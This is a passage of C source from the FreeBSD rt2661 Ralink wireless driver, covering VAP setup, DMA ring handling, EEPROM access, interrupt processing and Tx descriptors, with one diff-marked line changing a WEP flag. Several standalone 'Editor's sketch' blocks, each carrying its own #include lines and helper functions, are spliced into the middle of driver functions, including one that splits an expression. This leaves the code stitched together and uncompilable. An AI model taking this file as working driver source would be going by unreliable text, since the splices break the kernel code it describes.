uint8_t mac[IEEE80211_ADDR_LEN]) { struct ifnet *ifp = ic->ic_ifp; struct rt2661_vap *rvp; struct ieee80211vap *vap; switch (opmode) { case IEEE80211_M_STA: case IEEE80211_M_IBSS: case IEEE80211_M_AHDEMO: case IEEE80211_M_MONITOR: case IEEE80211_M_HOSTAP: case IEEE80211_M_MBSS: /* XXXRP: TBD */ if (!TAILQ_EMPTY(&ic->ic_vaps)) { if_printf(ifp, "only 1 vap supported\n"); return NULL; } if (opmode == IEEE80211_M_STA) flags |= IEEE80211_CLONE_NOBEACONS; break; case IEEE80211_M_WDS: if (TAILQ_EMPTY(&ic->ic_vaps) || ic->ic_opmode != IEEE80211_M_HOSTAP) { if_printf(ifp, "wds only supported in ap mode\n"); return NULL; } /* * Silently remove any request for a unique * bssid; WDS vap's always share the local * mac address. 
*/ flags &= ~IEEE80211_CLONE_BSSID; break; default: if_printf(ifp, "unknown opmode %d\n", opmode); return NULL; } rvp = (struct rt2661_vap *) malloc(sizeof(struct rt2661_vap), M_80211_VAP, M_NOWAIT | M_ZERO); if (rvp == NULL) return NULL; vap = &rvp->ral_vap; ieee80211_vap_setup(ic, vap, name, unit, opmode, flags, bssid, mac); /* override state transition machine */ rvp->ral_newstate = vap->iv_newstate; vap->iv_newstate = rt2661_newstate; #if 0 vap->iv_update_beacon = rt2661_beacon_update; #endif ieee80211_ratectl_init(vap); /* complete setup */ ieee80211_vap_attach(vap, ieee80211_media_change, ieee80211_media_status); if (TAILQ_FIRST(&ic->ic_vaps) == vap) ic->ic_opmode = opmode; return vap; } static void rt2661_vap_delete(struct ieee80211vap *vap) { struct rt2661_vap *rvp = RT2661_VAP(vap); ieee80211_ratectl_deinit(vap); ieee80211_vap_detach(vap); free(rvp, M_80211_VAP); } void rt2661_shutdown(void *xsc) { struct rt2661_softc *sc = xsc; rt2661_stop(sc); } void rt2661_suspend(void *xsc) { struct rt2661_softc *sc = xsc; rt2661_stop(sc); } void rt2661_resume(void *xsc) { struct rt2661_softc *sc = xsc; struct ifnet *ifp = sc->sc_ifp; if (ifp->if_flags & IFF_UP) rt2661_init(sc); } static void rt2661_dma_map_addr(void *arg, bus_dma_segment_t *segs, int nseg, int error) { if (error != 0) return; KASSERT(nseg == 1, ("too many DMA segments, %d should be 1", nseg)); *(bus_addr_t *)arg = segs[0].ds_addr; } static int rt2661_alloc_tx_ring(struct rt2661_softc *sc, struct rt2661_tx_ring *ring, int count) { int i, error; ring->count = count; ring->queued = 0; ring->cur = ring->next = ring->stat = 0; error = bus_dma_tag_create(bus_get_dma_tag(sc->sc_dev), 4, 0, BUS_SPACE_MAXADDR_32BIT, BUS_SPACE_MAXADDR, NULL, NULL, count * RT2661_TX_DESC_SIZE, 1, count * RT2661_TX_DESC_SIZE, 0, NULL, NULL, &ring->desc_dmat); if (error != 0) { device_printf(sc->sc_dev, "could not create desc DMA tag\n"); goto fail; } error = bus_dmamem_alloc(ring->desc_dmat, (void **)&ring->desc, BUS_DMA_NOWAIT | BUS_DMA_ZERO, &ring->desc_map); if (error != 0) { device_printf(sc->sc_dev, "could not allocate DMA memory\n"); goto fail; } error = bus_dmamap_load(ring->desc_dmat, ring->desc_map, ring->desc, count * RT2661_TX_DESC_SIZE, rt2661_dma_map_addr, &ring->physaddr, 0); if (error != 0) { device_printf(sc->sc_dev, "could not load desc DMA map\n"); goto fail; } ring->data = malloc(count * sizeof (struct rt2661_tx_data), M_DEVBUF, M_NOWAIT | M_ZERO); if (ring->data == NULL) { device_printf(sc->sc_dev, "could not allocate soft data\n"); error = ENOMEM; goto fail; } error = bus_dma_tag_create(bus_get_dma_tag(sc->sc_dev), 1, 0, BUS_SPACE_MAXADDR_32BIT, BUS_SPACE_MAXADDR, NULL, NULL, MCLBYTES, RT2661_MAX_SCATTER, MCLBYTES, 0, NULL, NULL, &ring->data_dmat); if (error != 0) { device_printf(sc->sc_dev, "could not create data DMA tag\n"); goto fail; } for (i = 0; i < count; i++) { error = bus_dmamap_create(ring->data_dmat, 0, &ring->data[i].map); if (error != 0) { device_printf(sc->sc_dev, "could not create DMA map\n"); goto fail; } } return 0; fail: rt2661_free_tx_ring(sc, ring); return error; } static void rt2661_reset_tx_ring(struct rt2661_softc *sc, struct rt2661_tx_ring *ring) { struct rt2661_tx_desc *desc; struct rt2661_tx_data *data; int i; for (i = 0; i < ring->count; i++) { desc = &ring->desc[i]; data = &ring->data[i]; if (data->m != NULL) { bus_dmamap_sync(ring->data_dmat, data->map, BUS_DMASYNC_POSTWRITE); bus_dmamap_unload(ring->data_dmat, data->map); m_freem(data->m); data->m = NULL; } if (data->ni != NULL) { 
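/*
 * Editor's sketch: rt2661_dma_map_addr() above is the usual busdma(9)
 * callback for a single-segment load: it ignores the error argument (the
 * caller checks the bus_dmamap_load() return value), asserts nseg == 1 and
 * copies ds_addr out through the opaque pointer, which is how the ring's
 * physical address ends up in ring->physaddr.  Stand-in types are used here
 * so the shape of the pattern can be shown outside the kernel; they are not
 * the real busdma definitions.
 */
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

typedef uint64_t fake_bus_addr_t;	/* stand-in for bus_addr_t */
typedef struct {
	fake_bus_addr_t ds_addr;
	size_t ds_len;
} fake_bus_dma_segment_t;		/* stand-in for bus_dma_segment_t */

static void
single_seg_cb(void *arg, fake_bus_dma_segment_t *segs, int nseg, int error)
{
	if (error != 0)
		return;			/* load failed; nothing to record */
	assert(nseg == 1);		/* ring memory must be contiguous */
	*(fake_bus_addr_t *)arg = segs[0].ds_addr;
}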
ieee80211_free_node(data->ni); data->ni = NULL; } desc->flags = 0; } bus_dmamap_sync(ring->desc_dmat, ring->desc_map, BUS_DMASYNC_PREWRITE); ring->queued = 0; ring->cur = ring->next = ring->stat = 0; } static void rt2661_free_tx_ring(struct rt2661_softc *sc, struct rt2661_tx_ring *ring) { struct rt2661_tx_data *data; int i; if (ring->desc != NULL) { bus_dmamap_sync(ring->desc_dmat, ring->desc_map, BUS_DMASYNC_POSTWRITE); bus_dmamap_unload(ring->desc_dmat, ring->desc_map); bus_dmamem_free(ring->desc_dmat, ring->desc, ring->desc_map); } if (ring->desc_dmat != NULL) bus_dma_tag_destroy(ring->desc_dmat); if (ring->data != NULL) { for (i = 0; i < ring->count; i++) { data = &ring->data[i]; if (data->m != NULL) { bus_dmamap_sync(ring->data_dmat, data->map, BUS_DMASYNC_POSTWRITE); bus_dmamap_unload(ring->data_dmat, data->map); m_freem(data->m); } if (data->ni != NULL) ieee80211_free_node(data->ni); if (data->map != NULL) bus_dmamap_destroy(ring->data_dmat, data->map); } free(ring->data, M_DEVBUF); } if (ring->data_dmat != NULL) bus_dma_tag_destroy(ring->data_dmat); } static int rt2661_alloc_rx_ring(struct rt2661_softc *sc, struct rt2661_rx_ring *ring, int count) { struct rt2661_rx_desc *desc; struct rt2661_rx_data *data; bus_addr_t physaddr; int i, error; ring->count = count; ring->cur = ring->next = 0; error = bus_dma_tag_create(bus_get_dma_tag(sc->sc_dev), 4, 0, BUS_SPACE_MAXADDR_32BIT, BUS_SPACE_MAXADDR, NULL, NULL, count * RT2661_RX_DESC_SIZE, 1, count * RT2661_RX_DESC_SIZE, 0, NULL, NULL, &ring->desc_dmat); if (error != 0) { device_printf(sc->sc_dev, "could not create desc DMA tag\n"); goto fail; } error = bus_dmamem_alloc(ring->desc_dmat, (void **)&ring->desc, BUS_DMA_NOWAIT | BUS_DMA_ZERO, &ring->desc_map); if (error != 0) { device_printf(sc->sc_dev, "could not allocate DMA memory\n"); goto fail; } error = bus_dmamap_load(ring->desc_dmat, ring->desc_map, ring->desc, count * RT2661_RX_DESC_SIZE, rt2661_dma_map_addr, &ring->physaddr, 0); if (error != 0) { device_printf(sc->sc_dev, "could not load desc DMA map\n"); goto fail; } ring->data = malloc(count * sizeof (struct rt2661_rx_data), M_DEVBUF, M_NOWAIT | M_ZERO); if (ring->data == NULL) { device_printf(sc->sc_dev, "could not allocate soft data\n"); error = ENOMEM; goto fail; } /* * Pre-allocate Rx buffers and populate Rx ring. 
*/ error = bus_dma_tag_create(bus_get_dma_tag(sc->sc_dev), 1, 0, BUS_SPACE_MAXADDR_32BIT, BUS_SPACE_MAXADDR, NULL, NULL, MCLBYTES, 1, MCLBYTES, 0, NULL, NULL, &ring->data_dmat); if (error != 0) { device_printf(sc->sc_dev, "could not create data DMA tag\n"); goto fail; } for (i = 0; i < count; i++) { desc = &sc->rxq.desc[i]; data = &sc->rxq.data[i]; error = bus_dmamap_create(ring->data_dmat, 0, &data->map); if (error != 0) { device_printf(sc->sc_dev, "could not create DMA map\n"); goto fail; } data->m = m_getcl(M_NOWAIT, MT_DATA, M_PKTHDR); if (data->m == NULL) { device_printf(sc->sc_dev, "could not allocate rx mbuf\n"); error = ENOMEM; goto fail; } error = bus_dmamap_load(ring->data_dmat, data->map, mtod(data->m, void *), MCLBYTES, rt2661_dma_map_addr, &physaddr, 0); if (error != 0) { device_printf(sc->sc_dev, "could not load rx buf DMA map"); goto fail; } desc->flags = htole32(RT2661_RX_BUSY); desc->physaddr = htole32(physaddr); } bus_dmamap_sync(ring->desc_dmat, ring->desc_map, BUS_DMASYNC_PREWRITE); return 0; fail: rt2661_free_rx_ring(sc, ring); return error; } static void rt2661_reset_rx_ring(struct rt2661_softc *sc, struct rt2661_rx_ring *ring) { int i; for (i = 0; i < ring->count; i++) ring->desc[i].flags = htole32(RT2661_RX_BUSY); bus_dmamap_sync(ring->desc_dmat, ring->desc_map, BUS_DMASYNC_PREWRITE); ring->cur = ring->next = 0; } static void rt2661_free_rx_ring(struct rt2661_softc *sc, struct rt2661_rx_ring *ring) { struct rt2661_rx_data *data; int i; if (ring->desc != NULL) { bus_dmamap_sync(ring->desc_dmat, ring->desc_map, BUS_DMASYNC_POSTWRITE); bus_dmamap_unload(ring->desc_dmat, ring->desc_map); bus_dmamem_free(ring->desc_dmat, ring->desc, ring->desc_map); } if (ring->desc_dmat != NULL) bus_dma_tag_destroy(ring->desc_dmat); if (ring->data != NULL) { for (i = 0; i < ring->count; i++) { data = &ring->data[i]; if (data->m != NULL) { bus_dmamap_sync(ring->data_dmat, data->map, BUS_DMASYNC_POSTREAD); bus_dmamap_unload(ring->data_dmat, data->map); m_freem(data->m); } if (data->map != NULL) bus_dmamap_destroy(ring->data_dmat, data->map); } free(ring->data, M_DEVBUF); } if (ring->data_dmat != NULL) bus_dma_tag_destroy(ring->data_dmat); } static int rt2661_newstate(struct ieee80211vap *vap, enum ieee80211_state nstate, int arg) { struct rt2661_vap *rvp = RT2661_VAP(vap); struct ieee80211com *ic = vap->iv_ic; struct rt2661_softc *sc = ic->ic_ifp->if_softc; int error; if (nstate == IEEE80211_S_INIT && vap->iv_state == IEEE80211_S_RUN) { uint32_t tmp; /* abort TSF synchronization */ tmp = RAL_READ(sc, RT2661_TXRX_CSR9); RAL_WRITE(sc, RT2661_TXRX_CSR9, tmp & ~0x00ffffff); } error = rvp->ral_newstate(vap, nstate, arg); if (error == 0 && nstate == IEEE80211_S_RUN) { struct ieee80211_node *ni = vap->iv_bss; if (vap->iv_opmode != IEEE80211_M_MONITOR) { rt2661_enable_mrr(sc); rt2661_set_txpreamble(sc); rt2661_set_basicrates(sc, &ni->ni_rates); rt2661_set_bssid(sc, ni->ni_bssid); } if (vap->iv_opmode == IEEE80211_M_HOSTAP || vap->iv_opmode == IEEE80211_M_IBSS || vap->iv_opmode == IEEE80211_M_MBSS) { error = rt2661_prepare_beacon(sc, vap); if (error != 0) return error; } if (vap->iv_opmode != IEEE80211_M_MONITOR) rt2661_enable_tsf_sync(sc); else rt2661_enable_tsf(sc); } return error; } /* * Read 16 bits at address 'addr' from the serial EEPROM (either 93C46 or * 93C66). 
*/ static uint16_t rt2661_eeprom_read(struct rt2661_softc *sc, uint8_t addr) { uint32_t tmp; uint16_t val; int n; /* clock C once before the first command */ RT2661_EEPROM_CTL(sc, 0); RT2661_EEPROM_CTL(sc, RT2661_S); RT2661_EEPROM_CTL(sc, RT2661_S | RT2661_C); RT2661_EEPROM_CTL(sc, RT2661_S); /* write start bit (1) */ RT2661_EEPROM_CTL(sc, RT2661_S | RT2661_D); RT2661_EEPROM_CTL(sc, RT2661_S | RT2661_D | RT2661_C); /* write READ opcode (10) */ RT2661_EEPROM_CTL(sc, RT2661_S | RT2661_D); RT2661_EEPROM_CTL(sc, RT2661_S | RT2661_D | RT2661_C); RT2661_EEPROM_CTL(sc, RT2661_S); RT2661_EEPROM_CTL(sc, RT2661_S | RT2661_C); /* write address (A5-A0 or A7-A0) */ n = (RAL_READ(sc, RT2661_E2PROM_CSR) & RT2661_93C46) ? 5 : 7; for (; n >= 0; n--) { RT2661_EEPROM_CTL(sc, RT2661_S | (((addr >> n) & 1) << RT2661_SHIFT_D)); RT2661_EEPROM_CTL(sc, RT2661_S | (((addr >> n) & 1) << RT2661_SHIFT_D) | RT2661_C); } RT2661_EEPROM_CTL(sc, RT2661_S); /* read data Q15-Q0 */ val = 0; for (n = 15; n >= 0; n--) { RT2661_EEPROM_CTL(sc, RT2661_S | RT2661_C); tmp = RAL_READ(sc, RT2661_E2PROM_CSR); val |= ((tmp & RT2661_Q) >> RT2661_SHIFT_Q) << n; RT2661_EEPROM_CTL(sc, RT2661_S); } RT2661_EEPROM_CTL(sc, 0); /* clear Chip Select and clock C */ RT2661_EEPROM_CTL(sc, RT2661_S); RT2661_EEPROM_CTL(sc, 0); RT2661_EEPROM_CTL(sc, RT2661_C); return val; } static void rt2661_tx_intr(struct rt2661_softc *sc) { struct ifnet *ifp = sc->sc_ifp; struct rt2661_tx_ring *txq; struct rt2661_tx_data *data; uint32_t val; int qid, retrycnt; struct ieee80211vap *vap; for (;;) { struct ieee80211_node *ni; struct mbuf *m; val = RAL_READ(sc, RT2661_STA_CSR4); if (!(val & RT2661_TX_STAT_VALID)) break; /* retrieve the queue in which this frame was sent */ qid = RT2661_TX_QID(val); txq = (qid <= 3) ? &sc->txq[qid] : &sc->mgtq; /* retrieve rate control algorithm context */ data = &txq->data[txq->stat]; m = data->m; data->m = NULL; ni = data->ni; data->ni = NULL; /* if no frame has been sent, ignore */ if (ni == NULL) continue; else vap = ni->ni_vap; switch (RT2661_TX_RESULT(val)) { case RT2661_TX_SUCCESS: retrycnt = RT2661_TX_RETRYCNT(val); DPRINTFN(sc, 10, "data frame sent successfully after " "%d retries\n", retrycnt); if (data->rix != IEEE80211_FIXED_RATE_NONE) ieee80211_ratectl_tx_complete(vap, ni, IEEE80211_RATECTL_TX_SUCCESS, &retrycnt, NULL); ifp->if_opackets++; break; case RT2661_TX_RETRY_FAIL: retrycnt = RT2661_TX_RETRYCNT(val); DPRINTFN(sc, 9, "%s\n", "sending data frame failed (too much retries)"); if (data->rix != IEEE80211_FIXED_RATE_NONE) ieee80211_ratectl_tx_complete(vap, ni, IEEE80211_RATECTL_TX_FAILURE, &retrycnt, NULL); ifp->if_oerrors++; break; default: /* other failure */ device_printf(sc->sc_dev, "sending data frame failed 0x%08x\n", val); ifp->if_oerrors++; } DPRINTFN(sc, 15, "tx done q=%d idx=%u\n", qid, txq->stat); txq->queued--; if (++txq->stat >= txq->count) /* faster than % count */ txq->stat = 0; if (m->m_flags & M_TXCB) ieee80211_process_callback(ni, m, RT2661_TX_RESULT(val) != RT2661_TX_SUCCESS); m_freem(m); ieee80211_free_node(ni); } sc->sc_tx_timer = 0; ifp->if_drv_flags &= ~IFF_DRV_OACTIVE; rt2661_start_locked(ifp); } static void rt2661_tx_dma_intr(struct rt2661_softc *sc, struct rt2661_tx_ring *txq) { struct rt2661_tx_desc *desc; struct rt2661_tx_data *data; bus_dmamap_sync(txq->desc_dmat, txq->desc_map, BUS_DMASYNC_POSTREAD); for (;;) { desc = &txq->desc[txq->next]; data = &txq->data[txq->next]; if ((le32toh(desc->flags) & RT2661_TX_BUSY) || !(le32toh(desc->flags) & RT2661_TX_VALID)) break; 
bus_dmamap_sync(txq->data_dmat, data->map, BUS_DMASYNC_POSTWRITE); bus_dmamap_unload(txq->data_dmat, data->map); /* descriptor is no longer valid */ desc->flags &= ~htole32(RT2661_TX_VALID); DPRINTFN(sc, 15, "tx dma done q=%p idx=%u\n", txq, txq->next); if (++txq->next >= txq->count) /* faster than % count */ txq->next = 0; } bus_dmamap_sync(txq->desc_dmat, txq->desc_map, BUS_DMASYNC_PREWRITE); } static void rt2661_rx_intr(struct rt2661_softc *sc) { struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; struct rt2661_rx_desc *desc; struct rt2661_rx_data *data; bus_addr_t physaddr; struct ieee80211_frame *wh; struct ieee80211_node *ni; struct mbuf *mnew, *m; int error; bus_dmamap_sync(sc->rxq.desc_dmat, sc->rxq.desc_map, BUS_DMASYNC_POSTREAD); for (;;) { int8_t rssi, nf; desc = &sc->rxq.desc[sc->rxq.cur]; data = &sc->rxq.data[sc->rxq.cur]; if (le32toh(desc->flags) & RT2661_RX_BUSY) break; if ((le32toh(desc->flags) & RT2661_RX_PHY_ERROR) || (le32toh(desc->flags) & RT2661_RX_CRC_ERROR)) { /* * This should not happen since we did not request * to receive those frames when we filled TXRX_CSR0. */ DPRINTFN(sc, 5, "PHY or CRC error flags 0x%08x\n", le32toh(desc->flags)); ifp->if_ierrors++; goto skip; } if ((le32toh(desc->flags) & RT2661_RX_CIPHER_MASK) != 0) { ifp->if_ierrors++; goto skip; } /* * Try to allocate a new mbuf for this ring element and load it * before processing the current mbuf. If the ring element * cannot be loaded, drop the received packet and reuse the old * mbuf. In the unlikely case that the old mbuf can't be * reloaded either, explicitly panic. */ mnew = m_getcl(M_NOWAIT, MT_DATA, M_PKTHDR); if (mnew == NULL) { ifp->if_ierrors++; goto skip; } bus_dmamap_sync(sc->rxq.data_dmat, data->map, BUS_DMASYNC_POSTREAD); bus_dmamap_unload(sc->rxq.data_dmat, data->map); error = bus_dmamap_load(sc->rxq.data_dmat, data->map, mtod(mnew, void *), MCLBYTES, rt2661_dma_map_addr, &physaddr, 0); if (error != 0) { m_freem(mnew); /* try to reload the old mbuf */ error = bus_dmamap_load(sc->rxq.data_dmat, data->map, mtod(data->m, void *), MCLBYTES, rt2661_dma_map_addr, &physaddr, 0); if (error != 0) { /* very unlikely that it will fail... */ panic("%s: could not load old rx mbuf", device_get_name(sc->sc_dev)); } ifp->if_ierrors++; goto skip; } /* * New mbuf successfully loaded, update Rx ring and continue * processing. */ m = data->m; data->m = mnew; desc->physaddr = htole32(physaddr); /* finalize mbuf */ m->m_pkthdr.rcvif = ifp; m->m_pkthdr.len = m->m_len = (le32toh(desc->flags) >> 16) & 0xfff; rssi = rt2661_get_rssi(sc, desc->rssi); /* Error happened during RSSI conversion. */ if (rssi < 0) rssi = -30; /* XXX ignored by net80211 */ nf = RT2661_NOISE_FLOOR; if (ieee80211_radiotap_active(ic)) { struct rt2661_rx_radiotap_header *tap = &sc->sc_rxtap; uint32_t tsf_lo, tsf_hi; /* get timestamp (low and high 32 bits) */ tsf_hi = RAL_READ(sc, RT2661_TXRX_CSR13); tsf_lo = RAL_READ(sc, RT2661_TXRX_CSR12); tap->wr_tsf = htole64(((uint64_t)tsf_hi << 32) | tsf_lo); tap->wr_flags = 0; tap->wr_rate = ieee80211_plcp2rate(desc->rate, (desc->flags & htole32(RT2661_RX_OFDM)) ? 
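/*
 * Editor's sketch: the "replace before you hand off" Rx strategy used by
 * rt2661_rx_intr() below, in generic form.  A fresh buffer is obtained and
 * mapped first; only if that succeeds is the filled buffer passed up the
 * stack, otherwise the frame is dropped and the old buffer stays in the ring
 * (the driver additionally re-loads the old mbuf's DMA map in that case).
 * alloc_buf/free_buf/map_buf/pass_up are hypothetical stand-ins for
 * m_getcl(), m_freem(), bus_dmamap_load() and ieee80211_input().
 */
#include <stdbool.h>

struct rxslot { void *buf; unsigned long paddr; };

static bool
rx_replenish(struct rxslot *slot,
    void *(*alloc_buf)(void), void (*free_buf)(void *),
    bool (*map_buf)(void *buf, unsigned long *paddr),
    void (*pass_up)(void *buf))
{
	void *fresh = alloc_buf();
	unsigned long paddr;

	if (fresh == NULL)
		return false;		/* drop the frame, keep the old buffer */
	if (!map_buf(fresh, &paddr)) {
		free_buf(fresh);	/* driver re-loads the old map here */
		return false;
	}
	pass_up(slot->buf);		/* hand the filled buffer up the stack */
	slot->buf = fresh;		/* the ring slot now owns the fresh one */
	slot->paddr = paddr;
	return true;
}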
IEEE80211_T_OFDM : IEEE80211_T_CCK); tap->wr_antsignal = nf + rssi; tap->wr_antnoise = nf; } sc->sc_flags |= RAL_INPUT_RUNNING; RAL_UNLOCK(sc); wh = mtod(m, struct ieee80211_frame *); /* send the frame to the 802.11 layer */ ni = ieee80211_find_rxnode(ic, (struct ieee80211_frame_min *)wh); if (ni != NULL) { (void) ieee80211_input(ni, m, rssi, nf); ieee80211_free_node(ni); } else (void) ieee80211_input_all(ic, m, rssi, nf); RAL_LOCK(sc); sc->sc_flags &= ~RAL_INPUT_RUNNING; skip: desc->flags |= htole32(RT2661_RX_BUSY); DPRINTFN(sc, 15, "rx intr idx=%u\n", sc->rxq.cur); sc->rxq.cur = (sc->rxq.cur + 1) % RT2661_RX_RING_COUNT; } bus_dmamap_sync(sc->rxq.desc_dmat, sc->rxq.desc_map, BUS_DMASYNC_PREWRITE); } /* ARGSUSED */ static void rt2661_mcu_beacon_expire(struct rt2661_softc *sc) { /* do nothing */ } static void rt2661_mcu_wakeup(struct rt2661_softc *sc) { RAL_WRITE(sc, RT2661_MAC_CSR11, 5 << 16); RAL_WRITE(sc, RT2661_SOFT_RESET_CSR, 0x7); RAL_WRITE(sc, RT2661_IO_CNTL_CSR, 0x18); RAL_WRITE(sc, RT2661_PCI_USEC_CSR, 0x20); /* send wakeup command to MCU */ rt2661_tx_cmd(sc, RT2661_MCU_CMD_WAKEUP, 0); } static void rt2661_mcu_cmd_intr(struct rt2661_softc *sc) { RAL_READ(sc, RT2661_M2H_CMD_DONE_CSR); RAL_WRITE(sc, RT2661_M2H_CMD_DONE_CSR, 0xffffffff); } void rt2661_intr(void *arg) { struct rt2661_softc *sc = arg; struct ifnet *ifp = sc->sc_ifp; uint32_t r1, r2; RAL_LOCK(sc); /* disable MAC and MCU interrupts */ RAL_WRITE(sc, RT2661_INT_MASK_CSR, 0xffffff7f); RAL_WRITE(sc, RT2661_MCU_INT_MASK_CSR, 0xffffffff); /* don't re-enable interrupts if we're shutting down */ if (!(ifp->if_drv_flags & IFF_DRV_RUNNING)) { RAL_UNLOCK(sc); return; } r1 = RAL_READ(sc, RT2661_INT_SOURCE_CSR); RAL_WRITE(sc, RT2661_INT_SOURCE_CSR, r1); r2 = RAL_READ(sc, RT2661_MCU_INT_SOURCE_CSR); RAL_WRITE(sc, RT2661_MCU_INT_SOURCE_CSR, r2); if (r1 & RT2661_MGT_DONE) rt2661_tx_dma_intr(sc, &sc->mgtq); if (r1 & RT2661_RX_DONE) rt2661_rx_intr(sc); if (r1 & RT2661_TX0_DMA_DONE) rt2661_tx_dma_intr(sc, &sc->txq[0]); if (r1 & RT2661_TX1_DMA_DONE) rt2661_tx_dma_intr(sc, &sc->txq[1]); if (r1 & RT2661_TX2_DMA_DONE) rt2661_tx_dma_intr(sc, &sc->txq[2]); if (r1 & RT2661_TX3_DMA_DONE) rt2661_tx_dma_intr(sc, &sc->txq[3]); if (r1 & RT2661_TX_DONE) rt2661_tx_intr(sc); if (r2 & RT2661_MCU_CMD_DONE) rt2661_mcu_cmd_intr(sc); if (r2 & RT2661_MCU_BEACON_EXPIRE) rt2661_mcu_beacon_expire(sc); if (r2 & RT2661_MCU_WAKEUP) rt2661_mcu_wakeup(sc); /* re-enable MAC and MCU interrupts */ RAL_WRITE(sc, RT2661_INT_MASK_CSR, 0x0000ff10); RAL_WRITE(sc, RT2661_MCU_INT_MASK_CSR, 0); RAL_UNLOCK(sc); } static uint8_t rt2661_plcp_signal(int rate) { switch (rate) { /* OFDM rates (cf IEEE Std 802.11a-1999, pp. 
14 Table 80) */ case 12: return 0xb; case 18: return 0xf; case 24: return 0xa; case 36: return 0xe; case 48: return 0x9; case 72: return 0xd; case 96: return 0x8; case 108: return 0xc; /* CCK rates (NB: not IEEE std, device-specific) */ case 2: return 0x0; case 4: return 0x1; case 11: return 0x2; case 22: return 0x3; } return 0xff; /* XXX unsupported/unknown rate */ } static void rt2661_setup_tx_desc(struct rt2661_softc *sc, struct rt2661_tx_desc *desc, uint32_t flags, uint16_t xflags, int len, int rate, const bus_dma_segment_t *segs, int nsegs, int ac) { struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; uint16_t plcp_length; int i, remainder; desc->flags = htole32(flags); desc->flags |= htole32(len << 16); desc->flags |= htole32(RT2661_TX_BUSY | RT2661_TX_VALID); desc->xflags = htole16(xflags); desc->xflags |= htole16(nsegs << 13); desc->wme = htole16( RT2661_QID(ac) | RT2661_AIFSN(2) | RT2661_LOGCWMIN(4) | RT2661_LOGCWMAX(10)); /* * Remember in which queue this frame was sent. This field is driver * private data only. It will be made available by the NIC in STA_CSR4 * on Tx interrupts. */ desc->qid = ac; /* setup PLCP fields */ desc->plcp_signal = rt2661_plcp_signal(rate); desc->plcp_service = 4; len += IEEE80211_CRC_LEN; if (ieee80211_rate2phytype(ic->ic_rt, rate) == IEEE80211_T_OFDM) { desc->flags |= htole32(RT2661_TX_OFDM); plcp_length = len & 0xfff; desc->plcp_length_hi = plcp_length >> 6; desc->plcp_length_lo = plcp_length & 0x3f; } else { plcp_length = (16 * len + rate - 1) / rate; if (rate == 22) { remainder = (16 * len) % 22; if (remainder != 0 && remainder < 7) desc->plcp_service |= RT2661_PLCP_LENGEXT; } desc->plcp_length_hi = plcp_length >> 8; desc->plcp_length_lo = plcp_length & 0xff; if (rate != 2 && (ic->ic_flags & IEEE80211_F_SHPREAMBLE)) desc->plcp_signal |= 0x08; } /* RT2x61 supports scatter with up to 5 segments */ for (i = 0; i < nsegs; i++) { desc->addr[i] = htole32(segs[i].ds_addr); desc->len [i] = htole16(segs[i].ds_len); } } static int rt2661_tx_mgt(struct rt2661_softc *sc, struct mbuf *m0, struct ieee80211_node *ni) { struct ieee80211vap *vap = ni->ni_vap; struct ieee80211com *ic = ni->ni_ic; struct rt2661_tx_desc *desc; struct rt2661_tx_data *data; struct ieee80211_frame *wh; struct ieee80211_key *k; bus_dma_segment_t segs[RT2661_MAX_SCATTER]; uint16_t dur; uint32_t flags = 0; /* XXX HWSEQ */ int nsegs, rate, error; desc = &sc->mgtq.desc[sc->mgtq.cur]; data = &sc->mgtq.data[sc->mgtq.cur]; rate = vap->iv_txparms[ieee80211_chan2mode(ic->ic_curchan)].mgmtrate; wh = mtod(m0, struct ieee80211_frame *); - if (wh->i_fc[1] & IEEE80211_FC1_WEP) { + if (wh->i_fc[1] & IEEE80211_FC1_PROTECTED) { k = ieee80211_crypto_encap(ni, m0); if (k == NULL) { m_freem(m0); return ENOBUFS; } } error = bus_dmamap_load_mbuf_sg(sc->mgtq.data_dmat, data->map, m0, segs, &nsegs, 0); if (error != 0) { device_printf(sc->sc_dev, "could not map mbuf (error %d)\n", error); m_freem(m0); return error; } if (ieee80211_radiotap_active_vap(vap)) { struct rt2661_tx_radiotap_header *tap = &sc->sc_txtap; tap->wt_flags = 0; tap->wt_rate = rate; ieee80211_radiotap_tx(vap, m0); } data->m = m0; data->ni = ni; /* management frames are not taken into account for amrr */ data->rix = IEEE80211_FIXED_RATE_NONE; wh = mtod(m0, struct ieee80211_frame *); if (!IEEE80211_IS_MULTICAST(wh->i_addr1)) { flags |= RT2661_TX_NEED_ACK; dur = ieee80211_ack_duration(ic->ic_rt, rate, ic->ic_flags & IEEE80211_F_SHPREAMBLE); *(uint16_t *)wh->i_dur = htole16(dur); /* tell hardware to add timestamp in probe 
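/*
 * Editor's sketch: the CCK PLCP LENGTH computation from
 * rt2661_setup_tx_desc() above.  'rate' is in 500 kb/s units (2, 4, 11, 22),
 * so 16*len/rate is the airtime in microseconds, rounded up.  At 11 Mb/s
 * (rate == 22) the driver additionally sets the length-extension bit in the
 * PLCP SERVICE field when the remainder of (16*len) mod 22 is non-zero but
 * below 7; this is the rule used by the driver, reproduced here verbatim.
 */
#include <stdbool.h>
#include <stdint.h>

static uint16_t
cck_plcp_length(int len_bytes, int rate_500kbps, bool *lengext)
{
	uint16_t us = (16 * len_bytes + rate_500kbps - 1) / rate_500kbps;

	*lengext = false;
	if (rate_500kbps == 22) {
		int rem = (16 * len_bytes) % 22;
		if (rem != 0 && rem < 7)
			*lengext = true;
	}
	/*
	 * Example: len_bytes = 1504 at 11 Mb/s gives 16*1504 = 24064,
	 * 24064/22 = 1093 remainder 18, so LENGTH rounds up to 1094 us and,
	 * since the remainder is not in 1..6, the extension bit stays clear.
	 */
	return us;
}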
